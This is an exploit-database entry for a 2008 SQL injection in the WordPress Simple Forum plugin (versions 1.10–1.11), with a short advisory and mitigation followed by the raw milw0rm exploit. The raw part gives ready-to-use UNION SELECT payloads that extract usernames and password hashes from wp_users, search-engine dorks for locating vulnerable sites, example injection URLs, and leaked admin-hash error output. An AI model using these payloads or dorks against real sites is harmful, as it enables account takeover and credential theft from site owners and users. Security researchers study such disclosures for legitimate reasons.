Simple Forum Version 1.10-1.11 SQL Injection

vendor:

Simple Forum

by:

S@BUN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Simple Forum

Affected Version From: 1.1

Affected Version To: 1.11

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Simple Forum Version 1.10-1.11 SQL Injection

Simple Forum versions 1.10 and 1.11 are vulnerable to SQL injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the database. This can be done by appending malicious SQL queries to the vulnerable parameter in the URL. For example, an attacker can append &topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/* to the vulnerable parameter in the URL.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

###############################################################
#
# Simple Forum Version 1.10-1.11 SQL Injection
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAÄ°L : hackturkiye.hackturkiye@gmail.com
#
################################################################
Simple Forum - Version 1.10
Simple Forum - Version 1.10 - ( 2.1.3)
Simple Forum - Version 1.11

################################################################

EXPLAÄ°N=

sametimes password and username in error massege for axample you can see in

(bazen ÅŸifreler hatalarÄ±n iÃ§indedir)

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '|admin|b8329b6e20b9f84f7b44ee678a5f484d| WHERE topic_id=-1/**/UNION/**/SELECT/**' at line 1]
UPDATE wp_sftopics SET topic_opened = |admin|b8329b6e20b9f84f7b44ee678a5f484d| WHERE topic_id=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*

################################################################

 DORK 1 :

Simple Forum - Version 1.10
Simple Forum - Version 1.10 - ( 2.1.3)
Simple Forum - Version 1.11

 DORK 2 : allinurl: topic "forums?forum="

################################################################
  example

http://xxxxx/forums?forum=xxxx&topic= (expliot)

  EXPLOÄ°T 1 :

-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*

  EXPLOÄ°T 2 :

SÄ°METÄ°MES YOU CANT SEE (xxxx&topic) SOO USE THÄ°S EXPLOÄ°T AFTER forum=xxx(number)

  example

www.xxxxx/forums?forum=1(expliot)

&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*


################################################################
# S@BUN                   i AM NOT HACKER                S@BUN
################################################################

# milw0rm.com [2008-02-15]